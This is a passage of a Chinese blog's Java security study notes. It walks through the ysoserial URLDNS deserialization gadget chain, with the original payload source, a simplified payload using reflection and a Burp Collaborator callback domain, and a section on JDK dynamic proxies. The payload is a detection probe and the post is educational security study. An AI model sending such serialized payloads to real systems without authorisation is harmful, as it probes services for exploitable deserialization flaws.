java.net.URL;<br><br><span class="hljs-keyword">import</span> ysoserial.payloads.annotation.Authors;<br><span class="hljs-keyword">import</span> ysoserial.payloads.annotation.Dependencies;<br><span class="hljs-keyword">import</span> ysoserial.payloads.annotation.PayloadTest;<br><span class="hljs-keyword">import</span> ysoserial.payloads.util.PayloadRunner;<br><span class="hljs-keyword">import</span> ysoserial.payloads.util.Reflections;<br><br><br><span class="hljs-comment">/**</span><br><span class="hljs-comment"> *</span><br><span class="hljs-comment"> *   Gadget Chain:</span><br><span class="hljs-comment"> *     HashMap.readObject()</span><br><span class="hljs-comment"> *       HashMap.putVal()</span><br><span class="hljs-comment"> *         HashMap.hash()</span><br><span class="hljs-comment"> *           URL.hashCode()</span><br><span class="hljs-comment"> *</span><br><span class="hljs-comment"> */</span><br><span class="hljs-meta">@SuppressWarnings(&#123; &quot;rawtypes&quot;, &quot;unchecked&quot; &#125;)</span><br><span class="hljs-meta">@PayloadTest(skip = &quot;true&quot;)</span><br><span class="hljs-meta">@Dependencies()</span><br><span class="hljs-meta">@Authors(&#123; Authors.GEBL &#125;)</span><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">URLDNS</span> <span class="hljs-keyword">implements</span> <span class="hljs-title class_">ObjectPayload</span>&lt;Object&gt; &#123;<br><br>        <span class="hljs-keyword">public</span> Object <span class="hljs-title function_">getObject</span><span class="hljs-params">(<span class="hljs-keyword">final</span> String url)</span> <span class="hljs-keyword">throws</span> Exception &#123;<br><br>                <span class="hljs-comment">//Avoid DNS resolution during payload creation</span><br>                <span class="hljs-comment">//Since the field &lt;code&gt;java.net.URL.handler&lt;/code&gt; is transient, it will not be part of the serialized payload.</span><br>                <span class="hljs-type">URLStreamHandler</span> <span class="hljs-variable">handler</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">SilentURLStreamHandler</span>();<br><br>                <span class="hljs-type">HashMap</span> <span class="hljs-variable">ht</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">HashMap</span>(); <span class="hljs-comment">// HashMap that will contain the URL</span><br>                <span class="hljs-type">URL</span> <span class="hljs-variable">u</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">URL</span>(<span class="hljs-literal">null</span>, url, handler); <span class="hljs-comment">// URL to use as the Key</span><br>                ht.put(u, url); <span class="hljs-comment">//The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.</span><br><br>                Reflections.setFieldValue(u, <span class="hljs-string">&quot;hashCode&quot;</span>, -<span class="hljs-number">1</span>); <span class="hljs-comment">// During the put above, the URL&#x27;s hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.</span><br><br>                <span class="hljs-keyword">return</span> ht;<br>        &#125;<br><br>        <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-keyword">final</span> String[] args)</span> <span class="hljs-keyword">throws</span> Exception &#123;<br>                PayloadRunner.run(URLDNS.class, args);<br>        &#125;<br><br>        <span class="hljs-comment">/**</span><br><span class="hljs-comment">         * &lt;p&gt;This instance of URLStreamHandler is used to avoid any DNS resolution while creating the URL instance.</span><br><span class="hljs-comment">         * DNS resolution is used for vulnerability detection. It is important not to probe the given URL prior</span><br><span class="hljs-comment">         * using the serialized object.&lt;/p&gt;</span><br><span class="hljs-comment">         *</span><br><span class="hljs-comment">         * &lt;b&gt;Potential false negative:&lt;/b&gt;</span><br><span class="hljs-comment">         * &lt;p&gt;If the DNS name is resolved first from the tester computer, the targeted server might get a cache hit on the</span><br><span class="hljs-comment">         * second resolution.&lt;/p&gt;</span><br><span class="hljs-comment">         */</span><br>        <span class="hljs-keyword">static</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">SilentURLStreamHandler</span> <span class="hljs-keyword">extends</span> <span class="hljs-title class_">URLStreamHandler</span> &#123;<br><br>                <span class="hljs-keyword">protected</span> URLConnection <span class="hljs-title function_">openConnection</span><span class="hljs-params">(URL u)</span> <span class="hljs-keyword">throws</span> IOException &#123;<br>                        <span class="hljs-keyword">return</span> <span class="hljs-literal">null</span>;<br>                &#125;<br><br>                <span class="hljs-keyword">protected</span> <span class="hljs-keyword">synchronized</span> InetAddress <span class="hljs-title function_">getHostAddress</span><span class="hljs-params">(URL u)</span> &#123;<br>                        <span class="hljs-keyword">return</span> <span class="hljs-literal">null</span>;<br>                &#125;<br>        &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>URL 类可被序列化，其中包含 readObject 但是没有使用什么可利用的函数，而在 hashMap 类中 readObject 则会在最后使用 putVal 将 hash()处理后的 key 传入，达到反序列化时还原 hashMap 键值对的目的。而计算 hash 的过程中需要层层调用最终到达目标类中的 hashCode 方法完成计算，hashCode 方法又包含可利用操作，这就出现了可乘之机。</p>
<p><img src="/img/java%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E7%AC%94%E8%AE%B0/IctfbW7mToY4Tdxu7Z9ccmwWnYg.png" srcset="/img/loading.gif" lazyload></p>
<p>我们进入 HashMap.hash()函数，它调用 key 自身的 hashCode 函数计算。</p>
<p><img src="/img/java%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E7%AC%94%E8%AE%B0/JZ3wb4fOqoNYeyx04y0cnx9vnRd.png" srcset="/img/loading.gif" lazyload></p>
<p>URL 类中的 hashCode 函数如下，当 hashCode 值不为-1 时（初始默认值）直接返回（已经计算过 hashCode 不再重复），若为-1 则通过 handler 调用 hashCode()函数计算后返回。</p>
<p><img src="/img/java%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E7%AC%94%E8%AE%B0/P4sWbydMGoFijnx4qyCcS8PBnwf.png" srcset="/img/loading.gif" lazyload></p>
<p>URL 类中此处使用的是 URLStreamHandler，查看其 hashCode()函数，其中就会使用 getHostAddress()函数获取域名对应的 ip 地址，也就是实现了 DNS 查询的过程。</p>
<p><img src="/img/java%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E7%AC%94%E8%AE%B0/ZlQdbEFEHohXVDxSEo5cjZtWnOP.png" srcset="/img/loading.gif" lazyload></p>
<p>总结 URLDNS 的完整利用链</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-comment">/**</span><br><span class="hljs-comment"> *</span><br><span class="hljs-comment"> *   Gadget Chain:</span><br><span class="hljs-comment"> *     HashMap.readObject()</span><br><span class="hljs-comment"> *       HashMap.putVal()</span><br><span class="hljs-comment"> *         HashMap.hash()</span><br><span class="hljs-comment"> *           URL.hashCode()</span><br><span class="hljs-comment"> *             URLStreamHandler.hashCode()</span><br><span class="hljs-comment"> *               URLStreamHandler.getHostAddress()</span><br><span class="hljs-comment"> *                 InetAddress._getByName_()</span><br><span class="hljs-comment"> *</span><br><span class="hljs-comment"> */</span><br></code></pre></td></tr></table></figure>

<p>payload 编写思路即：</p>
<p>创建 URL 类对象写入正在监听 DNS 请求的域–&gt;put 将 URL 对象放入 HashMap–&gt; 序列化 HashMap</p>
<p>这里是一个简化的 URLDNS payload</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> Unserialization.example;<br><br><span class="hljs-keyword">import</span> java.lang.reflect.Field;<br><span class="hljs-keyword">import</span> java.util.HashMap;<br><span class="hljs-keyword">import</span> java.net.URL;<br><br><span class="hljs-keyword">import</span> org.example.Serialization;<br><span class="hljs-keyword">import</span> org.example.Unserialization;<span class="hljs-comment">//这里另外简单写的Serialization与Unserialization</span><br><br><span class="hljs-meta">@SuppressWarnings(&#123; &quot;rawtypes&quot;, &quot;unchecked&quot; &#125;)</span><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">URLDNS</span> &#123;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> Exception &#123;<br><br>        <span class="hljs-comment">//可以使用Burpsuite的Collaborator client功能监听DNS请求来验证攻击成功与否</span><br>        <span class="hljs-type">String</span> <span class="hljs-variable">url</span> <span class="hljs-operator">=</span> <span class="hljs-string">&quot;http://m0n1wabt3lm36f2kw6khfb7dp4v0jp.oastify.com&quot;</span>;<br>        <span class="hljs-type">URL</span> <span class="hljs-variable">u</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">URL</span>(url);<br><br>        Class&lt;?&gt; Clazz = u.getClass();<br>        <span class="hljs-type">Field</span> <span class="hljs-variable">hashCode</span> <span class="hljs-operator">=</span> Clazz.getDeclaredField(<span class="hljs-string">&quot;hashCode&quot;</span>);<br>        hashCode.setAccessible(<span class="hljs-literal">true</span>);<br><br>        hashCode.set(u, <span class="hljs-number">1</span>);<span class="hljs-comment">//避免生成payload时发起请求</span><br>        <span class="hljs-type">HashMap</span> <span class="hljs-variable">hashmap</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">HashMap</span>();<br>        hashmap.put(u, <span class="hljs-number">1</span>);<br>        hashCode.set(u, -<span class="hljs-number">1</span>);<span class="hljs-comment">//确保反序列化时生效</span><br><br>        Serialization._serialize_(hashmap);<br>        Unserialization._unserialize_(<span class="hljs-string">&quot;ser.bin&quot;</span>);<br>    &#125;<br><br>&#125;<br></code></pre></td></tr></table></figure>

<p>这里的 payload 不难发现比上面所说的思路似乎多了点东西。前面提过，URL 类中的 hashCode()会先判断 hashCode 值是否为初始值-1 来决定是否继续后面的 DNS 查询工作。</p>
<p><img src="/img/java%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E7%AC%94%E8%AE%B0/HuPVbFg2loUX9ix8MHYchvhCnEh.png" srcset="/img/loading.gif" lazyload></p>
<p>而一个 HashMap 对象进行 put 操作时如下，也会使用 hash()函数处理 key 值。所以倘若直接使用 put 将所需的 URL 对象放入 HashMap 对象，那么放入时就会执行 DNS 查询（这是一个新建的 URL 对象），放入后 hashCode≠-1，生成的 payload 也就不能再实现 DNS 查询，成为无效的 payload。</p>
<p><img src="/img/java%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E7%AC%94%E8%AE%B0/UCgebJWr1opZMPxUPhucSFHdnkf.png" srcset="/img/loading.gif" lazyload></p>
<p>因此我们需要在 put 操作前将 hashCode 值置为非-1，put 操作后再将 hashCode 值置为-1。</p>
<p>那么该如何实现这样的效果呢？这里就可以用到反射技术，在运行过程中动态的修改对象中的字段（注意 hashCode 是私有属性），在 put 之前 <code>hashCode.set(u, 1);</code> 避免生成 payload 时发起 DNS 请求，put 后 <code>hashCode.set(u, -1);</code> 重新置为-1 使其能在反序列化时生效。</p>
<h1 id="JDK-动态代理"><a href="#JDK-动态代理" class="headerlink" title="JDK 动态代理"></a>JDK 动态代理</h1><p>代理模式是一种结构型设计模式，它为目标对象提供一种代理，用来控制对目标对象的访问。客户端通过代理对象间接地访问目标对象，而不需要直接与目标对象进行交互，可以在不改变目标对象内容的前提下通过代理对象扩展目标对象的行为逻辑。分为静态代理和动态代理。</p>
<p>静态代理是通过硬编码实现，代理类需要实现目标类已实现的所有接口，并在其中调用目标类的方法。（这样较为麻烦且在 web 环境中无法得知其内部所有接口）</p>
<p>动态代理则是在运行时动态创建代理类。其中 JDK 动态代理是基于接口实现的代理，只能代理实现了接口的类。实现步骤如下：</p>
<ol>
<li>创建实现 InvocationHandler 接口的代理类工厂：在调用 Proxy 类的静态方法 newProxyInstance 时，会动态生成一个代理类。该代理类实现了目标接口，并且持有一个 InvocationHandler 类型的引用。</li>
<li>InvocationHandler 接口：InvocationHandler 是一个接口，它只有一个方法 invoke。在代理对象的方法被调用时，JVM 会自动调用代理类的 invoke 方法，并将被调用的方法名、参数等信息传递给该方法。</li>
<li>调用代理对象的方法：当代理对象的方法被调用时，JVM 会自动调用代理类的 invoke 方法。在 invoke 方法中，可以根据需要执行各种逻辑，比如添加日志、性能统计、事务管理等。</li>
<li>invoke 方法调用：在 invoke 方法中，通过反射机制调用目标对象的方法，并返回方法的返回值。在调用目标对象的方法前后，可以执行额外的逻辑。</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">import</span> java.lang.reflect.Proxy;<br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">ProxyTest</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args）&#123;</span><br><span class="hljs-params">        IUser user = new UserImpl()</span>;<br>        <span class="hljs-comment">//动态代理</span><br>        <span class="hljs-comment">//要代理的接口、要做的事情、cLassLoader</span><br>        <span class="hljs-type">InvocationHandLer</span> <span class="hljs-variable">userinvocationhandLer</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">UserInvocationHandler</span>(user);<br>        <span class="hljs-type">IUser</span> <span class="hljs-variable">userProxy</span> <span class="hljs-operator">=</span> (IUser) Proxy.newProxyInstance(user.getClass().getClassLoader(),<br>            user.getclass().getInterfaces(),<br>            userinvocationhandler);<br>        userProxy.update();<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">import</span> java.lang.reflect.InvocationHandler;<br><span class="hljs-keyword">import</span> java.lang.reflect.Method;<br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">UserInvocationHandler</span> <span class="hljs-keyword">implements</span> <span class="hljs-title class_">InvocationHandler</span> &#123;<br>    IUser user;<br>    <span class="hljs-keyword">public</span> <span class="hljs-title function_">UserInvocationHandler</span><span class="hljs-params">()</span>&#123;<br>    &#125;<br>    <br>    <span class="hljs-keyword">public</span> <span class="hljs-title function_">UserInvocationHandler</span><span class="hljs-params">(IUser user)</span>&#123;<br>        <span class="hljs-built_in">this</span>.user = user;<br>    &#125;<br>    <span class="hljs-meta">@Override</span><br>    <span class="hljs-keyword">public</span> Object <span class="hljs-title function_">invoke</span><span class="hljs-params">(object proxy, Method method,Object[] args)</span> <span class="hljs-keyword">throws</span> Throwable &#123;<br>        System.out.println(<span class="hljs-string">&quot;调用了&quot;</span>+method.getName());<br>        method.invoke(user,args);<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">null</span>;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<h1 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h1><ul>
<li>p 牛《Java 安全漫谈》</li>
<li>B 站白日梦组长</li>
<li><a target="_blank" rel="noopener" href="https://withdong02.top/2025/08/10/Java%E5%8F%8D%E5%B0%84%E5%85%A5%E9%97%A8/">withdong02 的 java 反射入门</a></li>
</ul>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/Note-Summary/" class="category-chain-item">Note&amp;Summary</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/web/" class="print-no-link">#web</a>
      
        <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" class="print-no-link">#反序列化</a>
      
        <a href="/tags/java/" class="print-no-link">#java</a>
      
        <a href="/tags/%E5%8F%8D%E5%B0%84/" class="print-no-link">#反射</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>java 基础知识笔记</div>
      <div>http://5i1encee.top/2025/10/20/java基础知识笔记/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>5i1encee</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年10月20日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/10/20/%E7%BE%8A%E5%9F%8E%E6%9D%AF%202025%20WP/" title="羊城杯 2025 WP">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">羊城杯 2025 WP</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/06/02/D3CTF-d3jtar%E5%87%BA%E9%A2%98%E5%8F%8AWP/" title="D^3CTF2025 d3jtar 出题及 WP">
                        <span class="hidden-mobile">D^3CTF2025 d3jtar 出题及 WP</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"sYa0TwEtqgwqBctM2qchGbMG-gzGzoHsz","appKey":"Et6unsKpmF1YFlS3U5IE9nlB","path":"window.location.pathname","placeholder":"请友好交流哦~ ☆:.٩(๑❛ᴗ❛๑)۶°*☆","avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":true,"recordIP":true,"serverURLs":"https://sya0twet.lc-cn-n1-shared.com","emojiCDN":null,"emojiMaps":null,"enableQQ":true},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <footer class="mt-4"> <font size="2" face="Georgia"> <div class="text-center py-3"> <div style="font-size: 0.85rem"> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/duration.js"></script> </div> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>




  
<script src="/js/mouse_move.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
